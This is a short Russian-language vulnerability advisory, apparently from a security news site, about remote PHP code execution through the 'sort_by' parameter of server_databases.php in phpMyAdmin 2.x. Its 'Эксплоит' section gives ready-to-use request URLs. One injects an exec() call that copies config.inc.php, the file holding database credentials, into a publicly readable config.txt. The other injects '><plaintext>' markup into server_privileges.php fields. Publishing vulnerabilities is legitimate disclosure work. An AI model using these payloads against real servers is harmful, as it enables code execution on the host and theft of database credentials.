Программа: phpMyAdmin 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "sort_by" сценарием server_databases.php. Удаленный
пользователь может выполнить произвольный PHP код на целевой системе.

Эксплоит:

server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php"
config.txt'); //&sort_order=desc&token=[valid token]
server_privileges.php?token=[valid token]&username="><plaintext>&hostname="><plaintext>&dbname=&tablename=

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии